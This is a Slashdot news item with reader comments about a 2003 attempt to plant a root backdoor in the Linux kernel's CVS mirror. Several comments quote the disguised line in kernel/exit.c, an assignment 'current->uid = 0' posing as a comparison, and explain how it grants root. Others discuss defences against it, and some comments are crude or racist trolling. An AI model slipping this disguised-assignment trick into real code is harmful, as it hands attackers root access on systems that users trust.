
Linux Kernel Back-Door Hack Attempt Discovered

simoniker posted more than 10 years ago | from the intrigue-and-skullduggery dept.

Software 687

An anonymous reader writes "The BitKeeper to CVS gateway was apparently hacked in an attempt to add a root exploit back door to the Linux kernel, according to the linux-kernel archive. The change was in the file kernel/exit.c and changed the user ID of a process to root under the guise of checking the validity of some flags. The core Linux BitKeeper kernel repository was not at risk, and in fact it was the BitKeeper CVS export scripts that detected the unauthorized modifications to CVS. The changes were falsely attributed in CVS to long-time Linux developer davem (David Miller). Users of the BKCVS repository should resync their trees to remove the offending code if they had replicated it since yesterday."



OH shit, here we go again (-1, Flamebait)

Anonymous Coward | more than 10 years ago | (#7404299)

Time for RMS to spout off about needing a "Free" replacement to BitKeeper again?

Well well (4, Insightful)

toddhunter (659837) | more than 10 years ago | (#7404305)

Good to see the system works. You would wonder what would happen if said hacker was working for a company on a similar closed source program. Would it have been detected?

Re:Well well (1, Insightful)

Anonymous Coward | more than 10 years ago | (#7404317)

Most likely it would have been detected. We just wouldn't have heard about it.

Most companies use pretty good CVS-like tools.

Re:Well well (0)

Anonymous Coward | more than 10 years ago | (#7404318)

Problem is, it wasn't detected in time to keep it from replicating out. Ooops.

Re:Well well (5, Interesting)

chill (34294) | more than 10 years ago | (#7404358)

> Good to see the system works. You would wonder what would happen if said hacker was working for a company on a similar closed source program. Would it have been detected?

You mean like Borland's Interbase? The compiled-in backdoor [cert.org] wasn't discovered until after the database was open-sourced.

My favorite quote from the advisory is:

"This vulnerability was not introduced by unauthorized modifications to the original vendor's source. It was introduced by maintainers of the code within Borland. The back door account password cannot be changed using normal operational commands, nor can the account be deleted from existing vulnerable servers [see References]."

How long was it in there? "These security holes affect all version of InterBase shipped since 1994, on all platforms."

The advisory dates from 2001 -- you do the math.

Re:Well well (4, Insightful)

blastedtokyo (540215) | more than 10 years ago | (#7404401)

Hmmm..but would they have even found the security hole if it hadn't been open sourced?

Re:Well well (3, Insightful)

alannon (54117) | more than 10 years ago | (#7404438)

Why is this relevant? The fact that anybody that HAD seen the source code to Interbase could exploit it was enough. This could include ex-employees and contractors. Would you be happy with Microsoft including a back-door to all their software as long as only they knew how to exploit it?

Re:Well well (1)

stephanruby (542433) | more than 10 years ago | (#7404519)

I think the parent was making an argument for open source by saying that the exploit would never have been found if the product had remained proprietary and the people that implemented the back door could have used that back door forever and ever.

Re:Well well (1, Interesting)

Geek of Tech (678002) | more than 10 years ago | (#7404549)

> Why is this relevant? The fact that anybody that HAD seen the source code to Interbase could exploit it was enough. This could include ex-employees and contractors. Would you be happy with Microsoft including a back-door to all their software as long as only they knew how to exploit it?

What?! They don't already? Oh I forgot the Backdoor, uh, I mean DRM isn't due in Windows until Longhorn...

A friend showed me that once. (1)

TekReggard (552826) | more than 10 years ago | (#7404568)

You can do the same thing in a few other operating systems. I believe one of them is a unix of sorts but I do not know which one nor have I gone to look for it.

3 cheers for monolithic kernals (0)

Anonymous Coward | more than 10 years ago | (#7404402)

This is why monolithic kernals, liek the OpenBSD kernel are bettar. Since Theo dee Raddt is the only one who can edit the code, he is the only one that can add or remove back doors and exploits, so this kind of thing would not happen.

Re:3 cheers for monolithic kernals (2, Informative)

nathanh (1214) | more than 10 years ago | (#7404447)

> This is why monolithic kernals, liek the OpenBSD kernel are bettar. Since Theo dee Raddt is the only one who can edit the code...

You honestly have no idea what a "monolithic kernel" is, do you.

Or HIBT.

Re:3 cheers for monolithic kernals (2, Funny)

_Sprocket_ (42527) | more than 10 years ago | (#7404550)

When you troll like that, I think you're supposed to have some throw-away account so you can collect karma in some misguided intent to abuse the moderation system. I hear that's what all the kids are doing these days.

(wait - am I supposed to say "here goes my karma" at this point?) :)

Re:Well well (4, Funny)

Anonymous Coward | more than 10 years ago | (#7404408)

> You would wonder what would happen if said hacker was working for a company on a similar closed source program. Would it have been detected?


Well the 12 backdoors I put into the Windows XP kernel haven't been detected yet.

Re:Well well (5, Interesting)

Narphorium (667794) | more than 10 years ago | (#7404469)

Although I see where you're going with this, I think a lot of people might ask whether this shows vulnerability in OSS instead. Sure, you and I appreciate this as a validation of the system but is that really how the media is going to portray it?

All I'm saying is that I certainly won't be surprised when closed source vendors start using this in their anti-OSS campaigns.

Re:Well well (4, Insightful)

The Munger (695154) | more than 10 years ago | (#7404480)

> Good to see the system works.

And what if we just haven't discovered the code that got through yet...

You've got to ask - assume nothing.

+5, Tin-foil hat.

Re:Well well (3, Insightful)

Geek of Tech (678002) | more than 10 years ago | (#7404570)

Well, I guess that means all the closed source developers have the same problem. And I guess they probably don't know either.

Re:Well well (1)

Mr Europe (657225) | more than 10 years ago | (#7404496)

You don't say that the said hacker IS working for a company on similar closed source program (=unmentioned closed source operating systems) ?! :o

Linux is dead (-1, Flamebait)

Anonymous Coward | more than 10 years ago | (#7404307)

Long live FreeBSD!

Re:Linux is dead (-1, Flamebait)

Anonymous Coward | more than 10 years ago | (#7404379)

Sweet, we'll just tell these guys [kerneltrap.org] that FreeBSD 5 will be scalable enough to... err... be very scalable. Hah!

Daaaammmmmnnnn.. (4, Funny)

NegativeK (547688) | more than 10 years ago | (#7404310)

Someone has some damned big balls to do something like that...

Let's hope they're cut off.

Microsoft (3, Funny)

mr100percent (57156) | more than 10 years ago | (#7404311)

Anybody point fingers at Microsoft yet? SCO?

Re:Microsoft (5, Funny)

Cobralisk (666114) | more than 10 years ago | (#7404339)

No, but I'd like to see them claim copyright infringement on back-door code.

Re:Microsoft (1)

hpavc (129350) | more than 10 years ago | (#7404425)

Dunno if there is anything here of public value:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

Re:Microsoft (-1, Flamebait)

calcifer (649855) | more than 10 years ago | (#7404493)

bill gates could easily claim prior art on the backdoor code. cuz he is of the gay homosex. get it? backdoor=anal. I BRING TEH FUNNAY

Re:Microsoft (1)

rlowe69 (74867) | more than 10 years ago | (#7404375)

> Anybody point fingers at Microsoft yet? SCO?

Why stop there? ... you have six more!

And two thumbs too! :P :D

Re:Microsoft (1)

Malcontent (40834) | more than 10 years ago | (#7404376)

Of course neither MS nor SCO has ever acted unethically. It would be absurd to suspect companies of such high morals. I for one would be SHOCKED if somebody told me that MS or SCO might do something sleazy in order to undermine Linux.

Re:Microsoft (2, Interesting)

MrLint (519792) | more than 10 years ago | (#7404391)

My guess is more likely DDoS and spam hackers. Looking for ways to get in and grab more things to attack with.

Nah (0, Troll)

Greyfox (87712) | more than 10 years ago | (#7404412)

Neither one of those companies has the talent to pull this sort of thing off. It was probably some spammer looking for another couple of million hosts to hide behind now that Microsoft is posting bounties for compromising Windows code.

Re:Microsoft (1)

goranb (209371) | more than 10 years ago | (#7404444)

Microsoft has been searching for hackers [slashdot.org] ...
Obviously the bounty paid off... :)

Re:Microsoft (5, Insightful)

iabervon (1971) | more than 10 years ago | (#7404445)

The actual lines of code and the method by which they got there were far too clever for either Microsoft or SCO. In particular, it looked like a check for an invalid combination of flags by root, but would actually set the process to root in the case of the invalid combination of flags (and the error return value would be overwritten).

The intent was probably that a CVS user get the bad version, work on other stuff, and send the diff (including the bad lines) to a maintainer in an otherwise good patch. However, the BKCVS gateway got confused by someone other than it changing the CVS, and complained, and Larry McVoy pointed out the issue, someone asked what the lines were, and other people figured out what they'd do. Now, of course, if someone had gotten that bit accidentally and submitted it to a maintainer, they'd notice, so the attempt seems to have failed.

Linus pointed out a benefit to using BK: even if the official BK repository were changed, he doesn't pull from it (because his local copy has all of his changes), and he would get an error the next time he pushed to it. The repository that would have to be attacked is actually his local disk, behind a firewall and not set up for anyone else to access at all.

If RMS wants to rant about revision control systems, he'll need to say that CVS needs to be replaced with a more functional alternative (Subversion, perhaps), not BK.

Re:Microsoft (1)

coolfrood (459411) | more than 10 years ago | (#7404532)

Assuming it wasn't caught. Now somebody goes, makes changes and sends a patch to the maintainer. Isn't the maintainer going to see what the changes are? Won't a change in a totally unrelated file be very noticeable?

Conspiracy Theory (-1, Redundant)

wardomon (213812) | more than 10 years ago | (#7404313)

It was either SCO or Microsoft, or maybe both.

Re:Conspiracy Theory (0)

Anonymous Coward | more than 10 years ago | (#7404338)

If it was SCO, they would have just planted some of their source code... Oh, maybe they did.

Re:Conspiracy Theory (1)

wthynot (570397) | more than 10 years ago | (#7404405)

That would be giving them.........way too much credit.

Re:Conspiracy Theory (0)

Anonymous Coward | more than 10 years ago | (#7404547)

Or maybe the Fedorinati. (A secret society which threatens to take over Red Hat.)


Bad News (1)

MikeDawg (721537) | more than 10 years ago | (#7404315)

This is horrible. Thank heavens BitKeeper recognized the failed attempt to alter the code of the kernel. This is something the kernel developers should really come up and implement a plan to maintain kernel "safety".

Re:Bad News (2, Informative)

child_of_mercy (168861) | more than 10 years ago | (#7404417)

> the kernel developers should really come up and implement a plan to maintain kernel "safety".

Well it got caught didn't it?

It's the quiet ones you've got to watch...

Re:Bad News (4, Insightful)

fanatic (86657) | more than 10 years ago | (#7404452)

> It's the quiet ones you've got to watch...

Yes, everyone who's upset about exploits they haven't heard about, raise their hands...

Yet another reason to use open source software (3, Insightful)

Mipsalawishus (674206) | more than 10 years ago | (#7404325)

This is the reason I trust open source software. The power of peer review (in one form or another) catches these kinds of things before they are sent into the wild.

Re:Yet another reason to use open source software (3, Insightful)

mcroot (634911) | more than 10 years ago | (#7404432)

Peer review did not catch this. This was detected because people injected code into a specific place where inconsistencies are complained about by the revision control software.

Had this code come in through proper channels, I wouldn't be so sure that it would've been spotted. Most of the source code trojans people have found in the past were not well hidden, and were turned up relatively shortly. The cases I'm referring to are the trojaned configure scripts, that happened to, I believe, irssi and dsniff, or was it fragroute.. (it was definitely something by Dug Song)

If you would like to tout peer review, could you provide a valid example? They probably are out there, but I can't recall any, and this is not what happened here.

Re:Yet another reason to use open source software (1)

BJH (11355) | more than 10 years ago | (#7404468)

Had it come in through normal channels, I very much doubt whether it would have been committed in the first place.
kernel/exit.c is a pretty stable area of the kernel - i.e., not one that changes very often. Any patch changing it would have been looked at by at least one core kernel hacker, and while the patch was crafted to avoid compiler warnings and look relatively legitimate, trying to explain why it would be needed probably would not have been easy.

Re:Yet another reason to use open source software (1)

mcroot (634911) | more than 10 years ago | (#7404535)

By normal channels, I mean, a person with commit access having their machine compromised.

As for peer review, the person doing the back door had a decent idea: there looked to be two commits, one of which was +58 -0, followed by a -58 +0, the second of which said "oops, edited the wrong file". I could see where people would have seen that and said "oh, he touched the wrong file, nothing changed here, these aren't the droids I'm looking for".

Re:Yet another reason to use open source software (1)

BJH (11355) | more than 10 years ago | (#7404557)

The only person that would matter is Linus, because he'd notice if there were any change to the main BK tree that didn't come from him.

!!! rag (3, Funny)

VAXGeek (3443) | more than 10 years ago | (#7404326)

Imagine if this had sneaked into some Longhorn code right before shipping. Many eyes make few mistakes.

Re:!!! rag (1)

Makoss (660100) | more than 10 years ago | (#7404478)

Many eyes make many mistakes. But luckily they're usually connected to many mouths/fingers which yell at each other until it's more right than not.

Yay peer review.

Re:!!! rag (1)

Timesprout (579035) | more than 10 years ago | (#7404522)

This was detected by BitKeeper, not someone reading thru code, Linus's personal choice as Version Control system amid a lot of controversy if I recall correctly. Looks like he has been vindicated in his choice.

hmm (4, Funny)

Anonymous Coward | more than 10 years ago | (#7404333)

Sounds like a plan to get the dirty GNU/hippies to upgrade to the real BitKeeper instead of using the communist CVS gateway.

That McVoy is a smart one!

Did you know his programmers need to feed their families and pay their mortgages? Very sad situation, I hope everybody buys 10-15 licenses ASAP.

hehe (0, Flamebait)

lone_marauder (642787) | more than 10 years ago | (#7404334)

As usual, Microsoft is overplaying its hand. They should stick to astroturfing slashdot.

Someone needs to get with the program... (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404342)

...and that someone is everyone.

more reason to sign patches? (5, Insightful)

tomstdenis (446163) | more than 10 years ago | (#7404344)

Why not just establish a web-o-trust and sign patches?

That way people who hack in won't be able to send in signed patches to the system [e.g. even if they physically update the tree others can trivially spot the unsigned patches].

That would of course, require people to actually think about security in terms of "oh sure people won't hack it because it hasn't been done...much...before."

Tom

Re:more reason to sign patches? (1, Insightful)

Anonymous Coward | more than 10 years ago | (#7404410)

this wouldn't solve much.. now the barrier for adding a backdoor would be hacking a contributor's computer.

Re:more reason to sign patches? (1)

KFK - Wildcat (512842) | more than 10 years ago | (#7404566)

They say they'll add GPG signatures shortly [iu.edu], which has to be a good thing.

However, realise that this backdoor attempt was caught very early on, and by reading the comments posted on LKML, it almost certainly couldn't have been included in the main BK source tree, as updates to it would have stopped working (locally stored versions being different from the server version, this would have been immediately noticed.) So I'd say that there are already proper verifications preventing backdoors.
Of course, more verifications can't hurt.

Re:more reason to sign patches? (1, Insightful)

Tailhook (98486) | more than 10 years ago | (#7404571)

How would a web of trust help? Odds are the backdoor was introduced by compromising some developer's machine. If that is the case then whatever cert would be needed to sign a patch would probably also be compromised.

All signatures would do is raise the bar a tiny bit and provide a false sense of security. Whoever pulled this off wouldn't be hindered in the least if the bar had been a little higher. At best you would be able to point a finger at the developer responsible for the cert, but why would the perpetrator care about that?

There is no magic bullet for this kind of thing. It's Open Source and the operative word is "open." Only because it's open was this caught. Closed source is even worse.

guide to getting rid of slashdot ads (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404355)

#1 go to mozilla.org and get mozilla for your platform.

#2 install and go to slashdot.org

#3 right click on ads and select "block images from this server"

slashdot has gone totally crazy with advertising. what they don't realize, is that by adding more ads they are making people more likely to block them. get rid of these fucking banners and give us some text ads.


I'm impressed (0, Insightful)

Anonymous Coward | more than 10 years ago | (#7404360)

This is why I think OS is the ultimate meritocracy, those who shine bright shine brighter than all, illuminating the darkness and bringing out those who lurk in the shadows.

Hmmm. (-1, Troll)

Pig Hogger (10379) | more than 10 years ago | (#7404362)

I wonder how many times this was done to the Windows NT kernel...

Re:Hmmm. (0)

Anonymous Coward | more than 10 years ago | (#7404530)

NSA Key [greenend.org.uk]

Curious about the hack, was it remote? (3, Interesting)

nereid666 (533498) | more than 10 years ago | (#7404371)

I want to know if the hack was a remote backdoor or "only" a local root compromise, in order to know how bad the hacker that tried to do this was.
Thanks to the admins and developers who detected that!

Re:Curious about the hack, was it remote? (1)

BJH (11355) | more than 10 years ago | (#7404439)

Local root, by the looks of it. The changed file was kernel/exit.c, and the change was faked to look like it was doing something, if not reasonable, at least relatively harmless. This line is the killer:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

As noted on LKML, (current->uid = 0) was probably deliberately surrounded by brackets to avoid a gcc warning of an assignment within a test.
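
The effect of the line quoted in the comment above, as an added example that is not part of the original thread or of the kernel source: a user-space model of the check next to the comparison it imitates, followed by a line-based review heuristic that flags an assignment inside an if condition. The struct, the function names and the DEMO_ constants are assumptions made for the illustration.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Flag values as defined for __WCLONE and __WALL in Linux's wait.h. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

/* Hypothetical stand-in for the kernel's task structure. */
struct demo_task { unsigned int uid; };

/* Model of the line from the thread: '=' stores 0 in uid, and the value of
 * that assignment (0) makes the condition false, so retval is never set. */
static int check_backdoored(struct demo_task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the line pretends to be: a comparison that leaves uid untouched.
 * With the constant on the left, a mistyped '=' would not compile. */
static int check_comparison(struct demo_task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (0 == current->uid))
        retval = -EINVAL;
    return retval;
}

/* Review heuristic: return 1 if an if-condition on this line contains an
 * assignment '=' (including += and similar), ignoring ==, !=, <= and >=.
 * Line-based only: it does not parse strings, comments or multi-line ifs. */
static int has_assignment_in_if(const char *line)
{
    const char *p = line;
    while ((p = strstr(p, "if")) != NULL) {
        const char *q = p + 2;
        /* "if" must start a word, not sit inside an identifier */
        int boundary = (p == line) ||
                       !(isalnum((unsigned char)p[-1]) || p[-1] == '_');
        while (*q == ' ' || *q == '\t')
            q++;
        if (boundary && *q == '(') {
            int depth = 0;
            for (; *q; q++) {
                if (*q == '(') {
                    depth++;
                } else if (*q == ')') {
                    if (--depth == 0)
                        break;              /* end of this condition */
                } else if (*q == '=') {
                    if (q[1] == '=') {      /* '==' comparison */
                        q++;
                        continue;
                    }
                    if (strchr("!<>", q[-1]))
                        continue;           /* '!=', '<=', '>=' */
                    return 1;               /* bare assignment */
                }
            }
        }
        p += 2;
    }
    return 0;
}

int main(void)
{
    /* Constructed inputs: an unprivileged caller passing both flags. */
    struct demo_task a = { 1000 }, b = { 1000 };
    int ra = check_backdoored(&a, DEMO_WCLONE | DEMO_WALL);
    int rb = check_comparison(&b, DEMO_WCLONE | DEMO_WALL);
    const char *quoted =
        "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))";

    printf("backdoored check: retval=%d uid=%u\n", ra, a.uid);
    printf("comparison check: retval=%d uid=%u\n", rb, b.uid);
    printf("heuristic flags quoted line: %d\n", has_assignment_in_if(quoted));
    return 0;
}
```

The extra parentheses around the assignment are what keep gcc's assignment-in-condition warning quiet, so a textual check like this one has to look at the operator itself.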

Hats Off (1)

00RUSS (549125) | more than 10 years ago | (#7404382)

Hats off to the people who check and report this kind of stuff.

First of Many? (1)

mikewren420 (264173) | more than 10 years ago | (#7404387)

Will this be the first of more kernel backdoors, now that the idea is out there?

Re:First of Many? (5, Insightful)

nathanh (1214) | more than 10 years ago | (#7404466)

Will this be the first of more kernel backdoors, now that the idea is out there?

Isn't the pertinent question... was this the first?

Re:First of Many? (1, Informative)

Anonymous Coward | more than 10 years ago | (#7404541)

The idea [acm.org] has been out there a long time.

It makes you wonder (0, Troll)

Anonymous Coward | more than 10 years ago | (#7404389)

how many such holes are in Windows? They could never keep track of everything in the chaos at MS.

Alright.... (4, Funny)

aws4y (648874) | more than 10 years ago | (#7404421)

I'll call ESR, he's got the guns.
You guys get Linus and make sure he brings Tove, since she could probably kick all our asses.

Once that's done we'll Larry McVoy, by this time hopefully he will have the IP of the slimeball.

The Posse rides at Dawn, we can kill some Trolls along the way.

Re:Alright.... (0)

Anonymous Coward | more than 10 years ago | (#7404460)

make sure he brings Tove, since she could probably kick all our asses.
definitely...... [helsinki.fi]

So how do we know that there is only one? (3, Insightful)

dreadlord76 (562584) | more than 10 years ago | (#7404433)

Ok, so the scripts caught an attempt to install a back door. Everybody jumps up and down and sings the praise of the mighty Open Source Movement.

What if a backdoor was installed last week, or last month, but was not caught?

The fact that this was possible once should really make people think about the possibility of it having happened ALREADY, and determine if it is necessary to hunt through the code for a systematic review.

Instead, all we get is Microsoft Bashing...
Ugh

YOU DON'T SPEND MUCH TIME AROUND HERE, DO YOU? (0)

Anonymous Coward | more than 10 years ago | (#7404528)

n/t ^_^

yet another reason for (CONSTANT == var) (5, Insightful)

Anonymous Coward | more than 10 years ago | (#7404436)

In my code I always put the constant on the lhs so that the difference between the equality (==) and assignment (=) operator are caught by the compiler by accident.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

In this case, it would make an attempted root hole more visible, as (0 = current->uid) would not compile.

Re:yet another reason for (CONSTANT == var) (1, Insightful)

Anonymous Coward | more than 10 years ago | (#7404472)

doesn't lint check for this? If checkins were automatically run through lint something like this would have been easier to detect.

Re:yet another reason for (CONSTANT == var) (1)

JonnyRo88 (639703) | more than 10 years ago | (#7404475)

Agreed, it's really a very simple improvement to put the constant on the left hand side. I didn't even know that this should be done until I was recently informed by one of the CS professors at my school that this practice can seriously cut down on debugging logic errors.

BEGIN DISCLAIMER
Now I want to make it straight and clear that this statement is not intended to put down the kernel developers in any way, but rather to agree with the parent comment that this is a good idea in general. I have nothing but respect for the kernel developers.
END DISCLAIMER

Re:yet another reason for (CONSTANT == var) (0)

Anonymous Coward | more than 10 years ago | (#7404488)

Sure, that's good defensive style.

Is the kernel usually compiled with warnings set to flag this sort of subtle "mistake" (assignment in 'if')?

Is there a (tightly controlled) list of accepted warnings which can be used to make new ones stand out?

Also strict compiler settings... (0)

Anonymous Coward | more than 10 years ago | (#7404556)

FYI, Microsoft Visual C++ 6 throws a compile warning when you try to compile that code:
[source file].cpp([line]) : warning C4706: assignment within conditional expression
If you have the project set to treat warnings as errors (as you should if you have any self respect as a programmer), this code will also not compile.

Does GCC have a warning for this code? (and does it also have the option to treat warnings as errors?)
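
The kind of automated check asked about in the comments above (lint on check-in, a warning for assignment inside a conditional), sketched as an added example that is not part of the thread and not how any real lint or compiler is implemented. It flags every `if` condition containing an assignment, bracketed or not, so it also reports the legitimate `if ((p = f()) != 0)` idiom for human review; it does not understand comments or string literals. The function names and the sample input are constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Plain '=' or op=, but not ==, !=, <=, >= (simple rule: also skips <<=, >>=). */
static int is_assign(const char *s, size_t i)
{
    if (s[i] != '=' || s[i + 1] == '=')
        return 0;
    return i == 0 || strchr("=!<>", s[i - 1]) == NULL;
}

/* Count 'if (...)' conditions in src that contain an assignment. */
static int assign_in_if(const char *src)
{
    int hits = 0;
    size_t n = strlen(src);
    for (size_t i = 0; i + 1 < n; i++) {
        if (src[i] != 'i' || src[i + 1] != 'f')
            continue;
        if (i > 0 && (isalnum((unsigned char)src[i - 1]) || src[i - 1] == '_'))
            continue;                        /* tail of a longer identifier */
        size_t j = i + 2;
        while (j < n && isspace((unsigned char)src[j]))
            j++;
        if (j >= n || src[j] != '(')
            continue;                        /* not an if-condition */
        int depth = 0, found = 0;
        for (; j < n; j++) {                 /* walk to the matching ')' */
            if (src[j] == '(') depth++;
            else if (src[j] == ')' && --depth == 0) break;
            else if (is_assign(src, j)) found = 1;
        }
        hits += found;
        i = j;                               /* resume after this condition */
    }
    return hits;
}

/* Constructed sample: the condition quoted in the thread plus two harmless ones. */
static const char *SAMPLE =
    "if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -1;\n"
    "if (current->uid == 0) return 1;\n"
    "if (a <= b && c != d) x = 1;\n";

int main(void)
{
    printf("conditions with assignment: %d\n", assign_in_if(SAMPLE));
    return 0;
}
```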

In unrelated news, sockets.h changed a little... (0, Flamebait)

wrinkledshirt (228541) | more than 10 years ago | (#7404448)

typedef unsigned int csNetworkSocket;

#if !defined (CS_NET_SOCKET_INVALID)
// This is the stuff we stole from SCO, keep it hushed
# define CS_NET_SOCKET_INVALID ((csNetworkSocket)~0)
#endif

The more eyes... (2, Interesting)

Sean Clifford (322444) | more than 10 years ago | (#7404453)

> Setting current->uid to zero when options __WCLONE and __WALL are set? The
> retval is dead code because of the next line, but it looks like an attempt
> to backdoor the kernel, does it not?

It sure does. Note "current->uid = 0", not "current->uid == 0". Good eyes, I missed that. This function is sys_wait4() so by passing in __WCLONE|__WALL you are root. How nice.

And this is exactly why folks should insist on open source code.

Assuming it was noticed, and I have little reason to think that modification of a project's cvs tree would go unnoticed, a closed source product would have to go up and down the development chain of command. Then likely up and down the marketing chain of command while a decision whether to say anything about it (yeah, right) was made. Meetings would be held, blame would be assigned, and - oh yeah - a discussion about a fix would ensue.

Perhaps I exaggerate, but only a little.

I remember when a beta of a game [unnamed software publisher] was working on got ripped off our company ftp site and passed around. There was so much hype about our game that the leaked late beta was a serious disappointment and effectively killed the good buzz the marketing folks had whipped up. [It blew anyway, got shredded by the gaming rags, had a lot of potential but an inexperienced crew and very little financial support.]

Of course, this situation is nothing like that.

There's always going to be someone trying to backdoor the linux kernel, windows, osx, apps galore. Having the source on-hand to look at gives you that added level of confidence that "hey, worst case we can fix it - deal with it ourselves" rather than go through the denial, silence, lame excuse, patch cycle you go through with closed source products.

Re:The more eyes... (0)

Anonymous Coward | more than 10 years ago | (#7404511)

I bet John Romero wasn't too happy with your company and its FTP site:-)

Ebay-style attacks (3, Interesting)

blastedtokyo (540215) | more than 10 years ago | (#7404454)

While this attempt was thwarted, it makes you wonder though if someone could do an Ebay style 'attack.'

In other words: 1) Work on the code for a long time, developing good features and build up virtual reputation points so that people trust you. 2) One day decide to insert your backdoor amidst some big checkin. 3) Disappear.

It doesn't seem hard for someone to pay some random third world programmer to do so. For example, if Red Hat had a guy in Russia doing this they could, after the latest kernel was widely distributed, use it to attack Novell/SUSE.

disappear? (1)

Sean Clifford (322444) | more than 10 years ago | (#7404514)

Disappearing would only raise suspicion, not abate it. And it doesn't change the fact that this code gets reviewed a lot by a lot of different people. It would get noticed pretty quickly, methinks.

Think about how often your own code gets reviewed, debugged, optimised - not necessarily by you, but by Joe Coder on the same project or Wilma Coder some time down the road.

I doubt that someone sociopathic enough to work on something for years under a legitimate guise, then "one day" would be able to keep it together long enough to pull off the kind of coup you're proposing.

No, I tend to think that folks of this bent are found mostly among the crowd of virus authors.

Re:Ebay-style attacks (0, Offtopic)

agurkan (523320) | more than 10 years ago | (#7404525)

What does the country of the attacker have to do with attack capability? So, the people in Russia live in worse conditions than the US, they still have ethics, and some Americans don't, as you yourself point out (RedHat is mostly American).
I am sorry to see that this attitude of self-righteousness is being internalized by Americans and Europeans more and more every day.

Re:Ebay-style attacks (1)

blastedtokyo (540215) | more than 10 years ago | (#7404565)

easy...People of different countries have different needs of money for survival, local laws, technology savvy/effectiveness of law enforcement, influence of underworld (mafia, yakuza, etc.), etc.

Ethics are an interesting thing to bring into this. I'd argue it's more rational (ethical?) for someone whose family is starving/living under life threatening conditions to do a hack job than it is for someone living in a developed country who's doing it for a little more cash.

Re:Ebay-style attacks (0)

spicedhamhawg (718466) | more than 10 years ago | (#7404572)

3) Keep doing what you were always doing. If you suddenly disappear, that could raise suspicions. (No, I'm not a blackhat, but I am a sysadmin, and you have to think like your enemies think if you want to keep them out.)

4) ???

5) Profit!

Because of 5, it's clear that MS or SCO must be behind it ;-)

ROFL (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404516)

awesome!

My boss is gonna read this.. (0)

Anonymous Coward | more than 10 years ago | (#7404518)

Oh man, if my boss sees this, that's gonna be it right there.. No more Linux for us

Finding the culprit (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404538)

We should start by the process of elimination.

We know that the culprit was NOT a Negro. Negroes are not smart enough to even attempt something like this. Therefore we can rule out all the Negroes who are kernel hackers.

Come to think of it, there aren't any Negro kernel hackers. My bad!

No one is mentioning this (0, Insightful)

Dancin_Santa (265275) | more than 10 years ago | (#7404552)

The problem is that CVS was exploited. That's the big deal, Open Source, all encompassing versioning system.

It was Bitkeeper, the closed source, unfree, anti-community product that caught the problem.

This isn't a triumph of 'many eyes' seeing this bad code in Linux, it was a failure of 'many eyes' not catching the problem in CVS.

troll (0)

Anonymous Coward | more than 10 years ago | (#7404567)

Bitkeeper... caught the problem

Err, no. One of the kernel hackers watching the changes caught the issue.

Not a troll (0)

Anonymous Coward | more than 10 years ago | (#7404584)

From the writeup:

in fact it was the BitKeeper CVS export scripts that detected the unauthorized modifications to CVS

Microsoft reply (-1, Troll)

Blair16 (683764) | more than 10 years ago | (#7404576)

At Steve Ballmer's next big speech:
If Microsoft had open source code, anybody would be able to hack into our source tree and create a back door in the Windows OS. But since we are closed source, there are no vulnerabilities!

ALIANWARE = OVERRATED (0)

Anonymous Coward | more than 10 years ago | (#7404578)

Please, stop with all this bogus hype!